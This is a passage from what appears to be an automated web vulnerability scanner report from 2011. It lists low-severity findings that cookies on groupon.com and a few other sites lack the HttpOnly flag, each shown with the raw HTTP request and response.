Cookie: _tpaid=mbe; _tpref=http%3A%2F%2Fshare.meebo.com%2Fcim%2Fwhitev4.html; conversion_val=; _tpmed=cpc; _tpcid=q4; b=fae0ec84-7a51-11e0-9df0-0050569504f2; s=fae0fb02-7a51-11e0-9df0-0050569504f2; __utmz=44473723.1304955341.1.1.utmcsr=mbe|utmccn=q4|utmcmd=cpc|utmcct=2s208; __utmv=; _chartbeat2=gzdl5mb0frlvfs2p; __utma=44473723.870427670.1304955341.1304955341.1304955341.1; __utmc=44473723; __utmb=44473723.4.9.1304955365962; NREUM=s=1304955365968; visited=visit_1; adchemy_id=; division=dallas; _thepoint=8dd18fc853ae097ffe774ef38887ee55

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Date: Mon, 09 May 2011 15:38:30 GMT
Content-Type: text/html; charset=utf-8
Set-Cookie: adchemy_id=; path=/
Set-Cookie: division=dallas; path=/; expires=Thu, 09-Jun-2011 15:38:30 GMT
Set-Cookie: mobile=; path=/; expires=Thu, 01-Jan-1970 00:00:00 GMT
Set-Cookie: _thepoint=8dd18fc853ae097ffe774ef38887ee55; domain=.groupon.com; path=/; expires=Tue, 10 May 2011 15:38:30 GMT; HttpOnly
Status: 200
ETag: "0345c004e46753e8c959a4f64568fdd0"
X-Runtime: 100
Cache-Control: private, max-age=0, must-revalidate
Connection: close

<!DOCTYPE html>
<!--[if lt IE 7 ]> <html class="ie6" lang="en" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:groupon="http://groupon.com/ns/#" xmlns="http://www.w3.org/1999/xhtml"> <![endif]-->
<
...[SNIP]...

11.113. http://www.groupon.com/mobile  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.groupon.com
Path:   /mobile

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /mobile HTTP/1.1
Host: www.groupon.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _tpaid=mbe; _tpref=http%3A%2F%2Fshare.meebo.com%2Fcim%2Fwhitev4.html; conversion_val=; _tpmed=cpc; _tpcid=q4; b=fae0ec84-7a51-11e0-9df0-0050569504f2; s=fae0fb02-7a51-11e0-9df0-0050569504f2; __utmz=44473723.1304955341.1.1.utmcsr=mbe|utmccn=q4|utmcmd=cpc|utmcct=2s208; __utmv=; _chartbeat2=gzdl5mb0frlvfs2p; NREUM=s=1304955365968; visited=visit_1; __utma=44473723.870427670.1304955341.1304955341.1304955341.1; __utmc=44473723; __utmb=44473723.6.9.1304955489618; adchemy_id=; division=dallas; _thepoint=8dd18fc853ae097ffe774ef38887ee55

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Date: Mon, 09 May 2011 15:38:38 GMT
Content-Type: text/html; charset=utf-8
Set-Cookie: adchemy_id=; path=/
Set-Cookie: division=dallas; path=/; expires=Thu, 09-Jun-2011 15:38:38 GMT
Set-Cookie: mobile=; path=/; expires=Thu, 01-Jan-1970 00:00:00 GMT
Set-Cookie: _thepoint=8dd18fc853ae097ffe774ef38887ee55; domain=.groupon.com; path=/; expires=Tue, 10 May 2011 15:38:38 GMT; HttpOnly
Status: 200
ETag: "0b5465a4051743e698e7fc66860eed29"
X-Runtime: 94
Cache-Control: private, max-age=0, must-revalidate
Connection: close

<!DOCTYPE html>
<!--[if lt IE 7 ]> <html class="ie6" lang="en" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:groupon="http://groupon.com/ns/#" xmlns="http://www.w3.org/1999/xhtml"> <![endif]-->
<
...[SNIP]...

11.114. http://www.groupon.com/privacy  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.groupon.com
Path:   /privacy

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /privacy HTTP/1.1
Host: www.groupon.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _tpaid=mbe; _tpref=http%3A%2F%2Fshare.meebo.com%2Fcim%2Fwhitev4.html; adchemy_id=q4; conversion_val=; _tpmed=cpc; _tpcid=q4; division=dallas; b=fae0ec84-7a51-11e0-9df0-0050569504f2; s=fae0fb02-7a51-11e0-9df0-0050569504f2; _thepoint=8dd18fc853ae097ffe774ef38887ee55; __utmz=44473723.1304955341.1.1.utmcsr=mbe|utmccn=q4|utmcmd=cpc|utmcct=2s208; __utmv=; __utma=44473723.870427670.1304955341.1304955341.1304955341.1; __utmc=44473723; __utmb=44473723.2.9.1304955341313

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Date: Mon, 09 May 2011 15:35:45 GMT
Content-Type: text/html; charset=utf-8
Set-Cookie: adchemy_id=; path=/
Set-Cookie: division=dallas; path=/; expires=Thu, 09-Jun-2011 15:35:44 GMT
Set-Cookie: mobile=; path=/; expires=Thu, 01-Jan-1970 00:00:00 GMT
Set-Cookie: _thepoint=8dd18fc853ae097ffe774ef38887ee55; domain=.groupon.com; path=/; expires=Tue, 10 May 2011 15:35:45 GMT; HttpOnly
Status: 200
ETag: "674d83fb859dfa126fff53b15ed631d0"
X-Runtime: 734
Cache-Control: private, max-age=0, must-revalidate
Connection: close

<!DOCTYPE html>
<!--[if lt IE 7 ]> <html class="ie6" lang="en" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:groupon="http://groupon.com/ns/#" xmlns="http://www.w3.org/1999/xhtml"> <![endif]-->
<
...[SNIP]...

11.115. http://www.groupon.com/subscriptions/new  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.groupon.com
Path:   /subscriptions/new

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /subscriptions/new?utm_source=mbe&utm_medium=cpc&utm_campaign=q4&utm_content=2s208&p={site}&a=Banner&s=1x1 HTTP/1.1
Host: www.groupon.com
Proxy-Connection: keep-alive
Referer: http://share.meebo.com/cim/whitev4.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Date: Mon, 09 May 2011 15:35:34 GMT
Content-Type: text/html; charset=utf-8
Set-Cookie: utm_campaign=; domain=.groupon.com; path=/; expires=Thu, 01-Jan-1970 00:00:00 GMT
Set-Cookie: utm_content=; domain=.groupon.com; path=/; expires=Thu, 01-Jan-1970 00:00:00 GMT
Set-Cookie: _tpref=; domain=.groupon.com; path=/; expires=Thu, 01-Jan-1970 00:00:00 GMT
Set-Cookie: _tpmed=; domain=.groupon.com; path=/; expires=Thu, 01-Jan-1970 00:00:00 GMT
Set-Cookie: b=; domain=.groupon.com; path=/; expires=Thu, 01-Jan-1970 00:00:00 GMT
Set-Cookie: utm_term=; domain=.groupon.com; path=/; expires=Thu, 01-Jan-1970 00:00:00 GMT
Set-Cookie: _tpref2=; domain=.groupon.com; path=/; expires=Thu, 01-Jan-1970 00:00:00 GMT
Set-Cookie: utm_medium=; domain=.groupon.com; path=/; expires=Thu, 01-Jan-1970 00:00:00 GMT
Set-Cookie: referred_at=; domain=.groupon.com; path=/; expires=Thu, 01-Jan-1970 00:00:00 GMT
Set-Cookie: external_uid=; domain=.groupon.com; path=/; expires=Thu, 01-Jan-1970 00:00:00 GMT
Set-Cookie: utm_source=; domain=.groupon.com; path=/; expires=Thu, 01-Jan-1970 00:00:00 GMT
Set-Cookie: _tpoid=; domain=.groupon.com; path=/; expires=Thu, 01-Jan-1970 00:00:00 GMT
Set-Cookie: _tpcid=; domain=.groupon.com; path=/; expires=Thu, 01-Jan-1970 00:00:00 GMT
Set-Cookie: _tpuid=; domain=.groupon.com; path=/; expires=Thu, 01-Jan-1970 00:00:00 GMT
Set-Cookie: _tpaid=mbe; domain=.groupon.com; path=/; expires=Mon, 16-May-2011 15:35:34 GMT
Set-Cookie: _tpref=http%3A%2F%2Fshare.meebo.com%2Fcim%2Fwhitev4.html; domain=.groupon.com; path=/; expires=Mon, 16-May-2011 15:35:34 GMT
Set-Cookie: adchemy_id=q4; path=/
Set-Cookie: conversion_val=; path=/
Set-Cookie: _tpmed=cpc; domain=.groupon.com; path=/; expires=Mon, 16-May-2011 15:35:34 GMT
Set-Cookie: _tpcid=q4; domain=.groupon.com; path=/; expires=Mon, 16-May-2011 15:35:34 GMT
Set-Cookie: division=dallas; path=/; expires=Thu, 09-Jun-2011 15:35:34 GMT
Set-Cookie: b=fb20b364-7a51-11e0-a127-005056926ae9; path=/; expires=Sun, 09-May-2021 15:35:34 GMT
Set-Cookie: s=fb20c0ac-7a51-11e0-a127-005056926ae9; path=/
Set-Cookie: mobile=; path=/; expires=Thu, 01-Jan-1970 00:00:00 GMT
Set-Cookie: _thepoint=5ab241eb06d51f105c0c22a038766fce; domain=.groupon.com; path=/; expires=Tue, 10 May 2011 15:35:34 GMT; HttpOnly
Status: 200
ETag: "52f175b7121fc6cae943527725d56424"
X-S-COOKIE: fb20c0ac-7a51-11e0-a127-005056926ae9
X-B-COOKIE: fb20b364-7a51-11e0-a127-005056926ae9
X-Runtime: 80
Cache-Control: private, max-age=0, must-revalidate
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang='en' xmlns:fb='http://www.facebook.com/2008/fbml' xmlns='http://www
...[SNIP]...

11.116. https://www.groupon.com/dallas/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.groupon.com
Path:   /dallas/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /dallas/ HTTP/1.1
Host: www.groupon.com
Connection: keep-alive
Referer: https://www.groupon.com/login
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _tpaid=mbe; _tpref=http%3A%2F%2Fshare.meebo.com%2Fcim%2Fwhitev4.html; conversion_val=; _tpmed=cpc; _tpcid=q4; b=fae0ec84-7a51-11e0-9df0-0050569504f2; s=fae0fb02-7a51-11e0-9df0-0050569504f2; __utmz=44473723.1304955341.1.1.utmcsr=mbe|utmccn=q4|utmcmd=cpc|utmcct=2s208; __utmv=; _chartbeat2=gzdl5mb0frlvfs2p; __utma=44473723.870427670.1304955341.1304955341.1304955341.1; __utmc=44473723; __utmb=44473723.4.9.1304955365962; NREUM=s=1304955365968; adchemy_id=; division=dallas; _thepoint=8dd18fc853ae097ffe774ef38887ee55

Response

HTTP/1.1 302 Moved Temporarily
Server: EdgePrismSSL
Date: Mon, 09 May 2011 15:38:06 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
Set-Cookie: adchemy_id=; path=/
Set-Cookie: division=dallas; path=/; expires=Thu, 09-Jun-2011 15:38:06 GMT
Set-Cookie: _thepoint=8dd18fc853ae097ffe774ef38887ee55; domain=.groupon.com; path=/; expires=Tue, 10 May 2011 15:38:06 GMT; HttpOnly
Status: 302
Location: http://www.groupon.com/dallas/
X-Runtime: 11
Cache-Control: no-cache
Content-Length: 96

<html><body>You are being <a href="http://www.groupon.com/dallas/">redirected</a>.</body></html>

11.117. https://www.groupon.com/learn  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.groupon.com
Path:   /learn

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /learn HTTP/1.1
Host: www.groupon.com
Connection: keep-alive
Referer: https://www.groupon.com/login
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _tpaid=mbe; _tpref=http%3A%2F%2Fshare.meebo.com%2Fcim%2Fwhitev4.html; conversion_val=; _tpmed=cpc; _tpcid=q4; b=fae0ec84-7a51-11e0-9df0-0050569504f2; s=fae0fb02-7a51-11e0-9df0-0050569504f2; __utmz=44473723.1304955341.1.1.utmcsr=mbe|utmccn=q4|utmcmd=cpc|utmcct=2s208; __utmv=; _chartbeat2=gzdl5mb0frlvfs2p; __utma=44473723.870427670.1304955341.1304955341.1304955341.1; __utmc=44473723; __utmb=44473723.4.9.1304955365962; NREUM=s=1304955365968; adchemy_id=; division=dallas; _thepoint=8dd18fc853ae097ffe774ef38887ee55

Response

HTTP/1.1 302 Moved Temporarily
Server: EdgePrismSSL
Date: Mon, 09 May 2011 15:38:24 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
Set-Cookie: adchemy_id=; path=/
Set-Cookie: division=dallas; path=/; expires=Thu, 09-Jun-2011 15:38:24 GMT
Set-Cookie: _thepoint=8dd18fc853ae097ffe774ef38887ee55; domain=.groupon.com; path=/; expires=Tue, 10 May 2011 15:38:24 GMT; HttpOnly
Status: 302
Location: http://www.groupon.com/learn
X-Runtime: 15
Cache-Control: no-cache
Content-Length: 94

<html><body>You are being <a href="http://www.groupon.com/learn">redirected</a>.</body></html>

11.118. https://www.groupon.com/login  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.groupon.com
Path:   /login

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /login HTTP/1.1
Host: www.groupon.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _tpaid=mbe; _tpref=http%3A%2F%2Fshare.meebo.com%2Fcim%2Fwhitev4.html; adchemy_id=q4; conversion_val=; _tpmed=cpc; _tpcid=q4; division=dallas; b=fae0ec84-7a51-11e0-9df0-0050569504f2; s=fae0fb02-7a51-11e0-9df0-0050569504f2; _thepoint=8dd18fc853ae097ffe774ef38887ee55; __utmz=44473723.1304955341.1.1.utmcsr=mbe|utmccn=q4|utmcmd=cpc|utmcct=2s208; __utmv=; __utma=44473723.870427670.1304955341.1304955341.1304955341.1; __utmc=44473723; __utmb=44473723.2.9.1304955341313

Response

HTTP/1.1 200 OK
Server: EdgePrismSSL
Date: Mon, 09 May 2011 15:35:57 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
Set-Cookie: adchemy_id=; path=/
Set-Cookie: division=dallas; path=/; expires=Thu, 09-Jun-2011 15:35:57 GMT
Set-Cookie: mobile=; path=/; expires=Thu, 01-Jan-1970 00:00:00 GMT
Set-Cookie: _thepoint=8dd18fc853ae097ffe774ef38887ee55; domain=.groupon.com; path=/; expires=Tue, 10 May 2011 15:35:57 GMT; HttpOnly
Status: 200
ETag: "43fe666874ea7a2ba3c418d3a85b9227"
X-Runtime: 85
Cache-Control: private, max-age=0, must-revalidate
Content-Length: 36760

<!DOCTYPE html>
<!--[if lt IE 7 ]> <html class="ie6" lang="en" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:groupon="http://groupon.com/ns/#" xmlns="http://www.w3.org/1999/xhtml"> <![endif]-->
<
...[SNIP]...

11.119. https://www.groupon.com/mobile  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.groupon.com
Path:   /mobile

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /mobile HTTP/1.1
Host: www.groupon.com
Connection: keep-alive
Referer: https://www.groupon.com/users/new
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _tpaid=mbe; _tpref=http%3A%2F%2Fshare.meebo.com%2Fcim%2Fwhitev4.html; conversion_val=; _tpmed=cpc; _tpcid=q4; b=fae0ec84-7a51-11e0-9df0-0050569504f2; s=fae0fb02-7a51-11e0-9df0-0050569504f2; __utmz=44473723.1304955341.1.1.utmcsr=mbe|utmccn=q4|utmcmd=cpc|utmcct=2s208; __utmv=; _chartbeat2=gzdl5mb0frlvfs2p; __utma=44473723.870427670.1304955341.1304955341.1304955341.1; __utmc=44473723; __utmb=44473723.4.9.1304955365962; NREUM=s=1304955365968; visited=visit_1; adchemy_id=; division=dallas; _thepoint=8dd18fc853ae097ffe774ef38887ee55

Response

HTTP/1.1 302 Moved Temporarily
Server: EdgePrismSSL
Date: Mon, 09 May 2011 15:38:30 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
Set-Cookie: adchemy_id=; path=/
Set-Cookie: division=dallas; path=/; expires=Thu, 09-Jun-2011 15:38:30 GMT
Set-Cookie: _thepoint=8dd18fc853ae097ffe774ef38887ee55; domain=.groupon.com; path=/; expires=Tue, 10 May 2011 15:38:30 GMT; HttpOnly
Status: 302
Location: http://www.groupon.com/mobile
X-Runtime: 13
Cache-Control: no-cache
Content-Length: 95

<html><body>You are being <a href="http://www.groupon.com/mobile">redirected</a>.</body></html>

11.120. https://www.groupon.com/users  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.groupon.com
Path:   /users

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /users HTTP/1.1
Host: www.groupon.com
Connection: keep-alive
Referer: https://www.groupon.com/users/new
Cache-Control: max-age=0
Origin: https://www.groupon.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _tpaid=mbe; _tpref=http%3A%2F%2Fshare.meebo.com%2Fcim%2Fwhitev4.html; conversion_val=; _tpmed=cpc; _tpcid=q4; b=fae0ec84-7a51-11e0-9df0-0050569504f2; s=fae0fb02-7a51-11e0-9df0-0050569504f2; __utmz=44473723.1304955341.1.1.utmcsr=mbe|utmccn=q4|utmcmd=cpc|utmcct=2s208; __utmv=; _chartbeat2=gzdl5mb0frlvfs2p; __utma=44473723.870427670.1304955341.1304955341.1304955341.1; __utmc=44473723; __utmb=44473723.4.9.1304955365962; NREUM=s=1304955365968; adchemy_id=; division=dallas; _thepoint=8dd18fc853ae097ffe774ef38887ee55
Content-Length: 231

authenticity_token=ICfp1OvnKSBwXOdEcwa6DN9FNr34UQxyH%2FNwl5Q3Ga4%3D&user%5Bfull_name%5D=&user%5Bemail_address%5D=&user%5Bpassword%5D=&user%5Bpassword_confirmation%5D=&user%5Baccept_terms%5D=0&user%5Ba
...[SNIP]...

Response

HTTP/1.1 302 Moved Temporarily
Server: EdgePrismSSL
Date: Mon, 09 May 2011 15:36:13 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
Set-Cookie: adchemy_id=; path=/
Set-Cookie: division=dallas; path=/; expires=Thu, 09-Jun-2011 15:36:13 GMT
Set-Cookie: mobile=; path=/; expires=Thu, 01-Jan-1970 00:00:00 GMT
Set-Cookie: auth_token=; domain=.groupon.com; path=/; expires=Thu, 01-Jan-1970 00:00:00 GMT
Set-Cookie: _thepoint=8dd18fc853ae097ffe774ef38887ee55; domain=.groupon.com; path=/; expires=Tue, 10 May 2011 15:36:13 GMT; HttpOnly
Status: 302
Location: https://www.groupon.com/users/new
X-Runtime: 62
Cache-Control: no-cache
Content-Length: 99

<html><body>You are being <a href="https://www.groupon.com/users/new">redirected</a>.</body></html>

11.121. https://www.groupon.com/users/new  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.groupon.com
Path:   /users/new

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /users/new HTTP/1.1
Host: www.groupon.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _tpaid=mbe; _tpref=http%3A%2F%2Fshare.meebo.com%2Fcim%2Fwhitev4.html; conversion_val=; _tpmed=cpc; _tpcid=q4; b=fae0ec84-7a51-11e0-9df0-0050569504f2; s=fae0fb02-7a51-11e0-9df0-0050569504f2; __utmz=44473723.1304955341.1.1.utmcsr=mbe|utmccn=q4|utmcmd=cpc|utmcct=2s208; __utmv=; NREUM=s=1304955348574; __utma=44473723.870427670.1304955341.1304955341.1304955341.1; __utmc=44473723; __utmb=44473723.3.9.1304955341313; _chartbeat2=gzdl5mb0frlvfs2p; adchemy_id=; division=dallas; _thepoint=8dd18fc853ae097ffe774ef38887ee55

Response

HTTP/1.1 200 OK
Server: EdgePrismSSL
Date: Mon, 09 May 2011 15:36:08 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
Set-Cookie: adchemy_id=; path=/
Set-Cookie: division=dallas; path=/; expires=Thu, 09-Jun-2011 15:36:07 GMT
Set-Cookie: mobile=; path=/; expires=Thu, 01-Jan-1970 00:00:00 GMT
Set-Cookie: _thepoint=8dd18fc853ae097ffe774ef38887ee55; domain=.groupon.com; path=/; expires=Tue, 10 May 2011 15:36:08 GMT; HttpOnly
Status: 200
ETag: "bac993c076753d5871cf9db400d8c856"
X-Runtime: 612
Cache-Control: private, max-age=0, must-revalidate
Content-Length: 36677

<!DOCTYPE html>
<!--[if lt IE 7 ]> <html class="ie6" lang="en" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:groupon="http://groupon.com/ns/#" xmlns="http://www.w3.org/1999/xhtml"> <![endif]-->
<
...[SNIP]...

11.122. http://www.hnedata.net/features/tr_stock_charts  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hnedata.net
Path:   /features/tr_stock_charts

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /features/tr_stock_charts HTTP/1.1
Host: www.hnedata.net
Proxy-Connection: keep-alive
Referer: http://www.therepublic.com/home/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:37:09 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8i DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_fcgid/2.3.5
X-Powered-By: PHP/5.2.17
Expires: 0
cache-control: no-store, no-cache, must-revalidate
Pragma: no-cache
Set-Cookie: FreakAuth=5518e37387eae06696e574f8c1f4da91; expires=Mon, 09-May-2011 17:37:33 GMT; path=/
Last-Modified: Mon, 09 May 2011 15:37:09 GMT
Content-Type: text/html
Content-Length: 1583


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>The Republic<
...[SNIP]...

11.123. http://www.tinbuadserv.com/v3/serve.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tinbuadserv.com
Path:   /v3/serve.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /v3/serve.php?m=horoscope&c=0&rd=793&l=en&u=http%3A//www.fox8live.com/entertainment/horoscopes/default.aspx&r=http%3A//www.fox8live.com/content/aboutus/default.aspx HTTP/1.1
Host: www.tinbuadserv.com
Proxy-Connection: keep-alive
Referer: http://www.fox8live.com/entertainment/horoscopes/default.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:41:40 GMT
Server: Apache
P3P: policyref="http://www.tinbuadserv.com/v3/privacy/p3p.xml", CP="NOI NID DSP COR DEV PSA PSD IVA IVD OTP OUR OTR IND DEM PRE OTC"
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: tbcsrv3=kaBll62z16dkaZuQlaLVqtXYqtDOoZ%2BDqaZqmG2E2KaGqKZymKhVk9Wo0Oeq3Y9uq5ugbVK7hoSuq56hbVrE16epiG7VrW6ej3eZzdqUo4hu1a1tno%2BmrMLimFKhppylcobBi1qc4W1loFXP2KzW3FVz1KhmaohplKZan%2BBta5uQrZnWVZ3mcpmnVW%2BWoGNniG7VrWyej5Sqxs9Va9ltla1alp5nWpzhbWOgVc7UrIaopnKYqFVjmGGZq2qZj26rm6FtUtKi0JVz16drcoObbGaUa5Sjb4aopnKaqFWT1aDS1Kbd1pdanOFtYZlthNakyc6lm8nPoZ7Ln9WVc9enbHKD4aiSyqLP1KHSj26rm55tUohu1a1uno%2BXp87PnJ6IbtWtaZanVZ7Q5mucz6nHoZvT2lVz1Khpaoig0det0NJVc9SobGqIm9Hlp9fQoqjGkG6joGaclZnI4FVz1KhkaohjhK6rnqVtWsPPlpvbo8XiWp%2FgbWqbkIiDiG7VrWmXp1We0OCWldii1tSszdyhWpzhbWCgVYSuq56mbVrU05SiyZvE1KqGqKZykahVUqGmnKpyhtyjrMrdoaOIbtWtaJ6PVXPUqGpqiKDR16TF25panOFtYqBVx%2BFan%2BBta5uQnKPTVZ3mcpSnVVqc4W1ioFXS6Vqf1m1pnOFtZKBVxdSs149uq5uebVKIbtWtbZ6Ppq3D15dSoaacpm6ej5akxs%2Blk86U0OGd0OBhntDma5zPqcehm9PaYaDQ4KKjyaLS2Fqf4G1wm5CmpcicxuGt0Y9uq5ufZGqIZJKjaJSdY3Gap2ZSoaacq3KG3KOsyt2hkdJVneZylKdVWpzr; path=/; domain=.tinbuadserv.com
Vary: Accept-Encoding,User-Agent
Content-Type: text/javascript; charset=UTF-8
Content-Length: 584

tinbuAdServer.setArrayCookie("tbv3ads","browserlang|en","country|US","city|Dallas","state|TX","metro|623","zip|75207","area|214","lat|32.7825","lon|-96.8207","companyid|clearchannels","subdomain|","do
...[SNIP]...

12. Password field with autocomplete enabled  previous  next
There are 7 instances of this issue:

Issue background

